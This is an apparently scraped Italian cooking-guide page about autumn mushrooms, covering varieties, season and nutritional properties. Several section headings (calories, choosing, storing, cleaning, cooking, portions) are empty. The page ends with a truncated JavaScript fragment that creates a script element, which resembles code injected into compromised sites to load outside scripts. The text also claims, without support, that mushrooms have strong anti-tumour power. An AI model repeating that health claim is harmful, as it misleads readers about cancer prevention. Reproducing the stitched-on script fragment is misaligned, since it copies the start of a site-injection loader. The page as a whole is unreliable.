L’autunno è la stagione dei funghi, ingrediente prezioso per cucinare ottimi piatti come i risotti. Si trovano un pò in tutta Italia, soprattutto al Centro-Nord e in zone montagnose. Scopriamo come utilizzarli e alcune caratteristiche.
CARATTERISTICHE
I funghi sono alimenti dalle molteplici varietà e dagli aromi inconfondibili, le specie coltivate si trovano tutto l’anno e sono principalmente il prataiolo (o champignon) ed il pioppino, mentre quelli di bosco hanno breve vita da ottobre agli inizi di dicembre e comprendono il celebre porcino, gli ovuli ed altri meno noti, ma altrettanto gustosi.
Si possono mangiare crudi o cotti, a seconda della varietà.
STAGIONE
settembre, ottobre, novembre, dicembre.
PROPRIETÀ NUTRITIVE
I funghi sono composti principalmente da acqua, una piccola percentuale di proteine (3,9%) e buoni quantitativi di sali minerali (in particolare potassio e fosforo). Possiedono buone quantità di vitamina B2
Hanno un elevato potere antineoplastico (proteggono il corpo dallo sviluppo di tumori) grazie alla loro ricchezza in selenio, magnesio e zinco. Il selenio svolge importanti funzioni all’interno dell’organismo: è un antiossidante, preserva l’elasticità dei tessuti e mantiene un buon funzionamento della tiroide.
Per quanto riguarda le funzioni organiche hanno effetto lassativo e sono un buon depurativo per il fegato.
Per la loro affinità con la famiglia delle muffe sono sconsigliati a coloro che sono allergici a muffe, lieviti e penicillina.
CALORIE
COME SCEGLIERE
COME CONSERVARE
COME PULIRE
PRINCIPALI METODI DI COTTURA
DOSI PER PERSONA
[:]var d=document;var s=d.createElement(‘script’